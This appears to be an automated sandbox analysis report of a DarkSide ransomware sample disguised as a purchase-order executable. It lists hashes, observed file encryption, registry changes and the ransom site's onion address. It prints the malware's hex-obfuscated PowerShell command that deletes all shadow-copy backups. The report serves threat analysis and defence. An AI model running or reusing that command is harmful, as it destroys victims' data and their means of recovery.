Analysis
-
max time kernel
57s -
max time network
81s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
04-08-2021 17:54
Static task
static1
Behavioral task
behavioral1
Sample
PurchaseOrderPoster.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
PurchaseOrderPoster.bin.exe
Resource
win10v20210408
General
-
Target
PurchaseOrderPoster.bin.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
Malware Config
Extracted
C:\\README.f2cbf9aa.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 15 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
PurchaseOrderPoster.bin.exedescription ioc process File renamed C:\Users\Admin\Pictures\ExitUnpublish.crw => C:\Users\Admin\Pictures\ExitUnpublish.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\ExitUnpublish.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\ProtectGet.tiff PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\ProtectGet.tiff => C:\Users\Admin\Pictures\ProtectGet.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\SubmitCheckpoint.raw => C:\Users\Admin\Pictures\SubmitCheckpoint.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\DisableApprove.tif.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\DisconnectWait.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\DisconnectWait.crw => C:\Users\Admin\Pictures\DisconnectWait.crw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\RestoreGrant.raw => C:\Users\Admin\Pictures\RestoreGrant.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\SubmitCheckpoint.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\ConvertToUnregister.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\DisableApprove.tif => C:\Users\Admin\Pictures\DisableApprove.tif.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\RestoreGrant.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File renamed C:\Users\Admin\Pictures\ConvertToUnregister.raw => C:\Users\Admin\Pictures\ConvertToUnregister.raw.f2cbf9aa PurchaseOrderPoster.bin.exe File opened for modification C:\Users\Admin\Pictures\ProtectGet.tiff.f2cbf9aa PurchaseOrderPoster.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f2cbf9aa.BMP" PurchaseOrderPoster.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f2cbf9aa.BMP" PurchaseOrderPoster.bin.exe -
Modifies Control Panel 1 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\Desktop\WallpaperStyle = "10" PurchaseOrderPoster.bin.exe -
Modifies registry class 5 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f2cbf9aa.ico" PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa PurchaseOrderPoster.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f2cbf9aa\ = "f2cbf9aa" PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa\DefaultIcon PurchaseOrderPoster.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f2cbf9aa PurchaseOrderPoster.bin.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exePurchaseOrderPoster.bin.exepid process 1688 powershell.exe 1688 powershell.exe 1972 PurchaseOrderPoster.bin.exe 1972 PurchaseOrderPoster.bin.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
PurchaseOrderPoster.bin.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeSecurityPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeTakeOwnershipPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeLoadDriverPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeSystemProfilePrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeSystemtimePrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeProfSingleProcessPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeIncBasePriorityPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeCreatePagefilePrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeBackupPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeRestorePrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeShutdownPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeDebugPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeSystemEnvironmentPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeRemoteShutdownPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeUndockPrivilege 1972 PurchaseOrderPoster.bin.exe Token: SeManageVolumePrivilege 1972 PurchaseOrderPoster.bin.exe Token: 33 1972 PurchaseOrderPoster.bin.exe Token: 34 1972 PurchaseOrderPoster.bin.exe Token: 35 1972 PurchaseOrderPoster.bin.exe Token: SeDebugPrivilege 1688 powershell.exe Token: SeBackupPrivilege 1180 vssvc.exe Token: SeRestorePrivilege 1180 vssvc.exe Token: SeAuditPrivilege 1180 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
PurchaseOrderPoster.bin.exedescription pid process target process PID 1972 wrote to memory of 1688 1972 PurchaseOrderPoster.bin.exe powershell.exe PID 1972 wrote to memory of 1688 1972 PurchaseOrderPoster.bin.exe powershell.exe PID 1972 wrote to memory of 1688 1972 PurchaseOrderPoster.bin.exe powershell.exe PID 1972 wrote to memory of 1688 1972 PurchaseOrderPoster.bin.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5b7546c0b9e4430370f293aaae4016784
SHA12dfdd1a95ed4b753d28678b4424e7d651c9361e2
SHA256801f1c2f32246bd5bb02615b1fd8c385b73abbb29b29a20c47ef4be4a0e2e366
SHA51203b0d992846adc4c00e9f44df5461dee27e1a40fe89c82f306240c89130598043df14ba352c1694f09fce3ae7d06ec5ae16ca548dc6ea14879f5fac000461175
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD51c25162407082e257e436093bf54505f
SHA16d9ee3dca14d634e47dba967980b5a4c3f191d82
SHA2560db98bca97c422ec840ad425b16a111afff3749eee9ed6589664234e8338b376
SHA5120c12a5dd7dd1fbfda5da3cc31b5e66543daf0d4d38b82074b2a881fa250f02d7d2c4c80d9f132072f981c046c47318e5122ad97e49b01669f5830a8df12eada3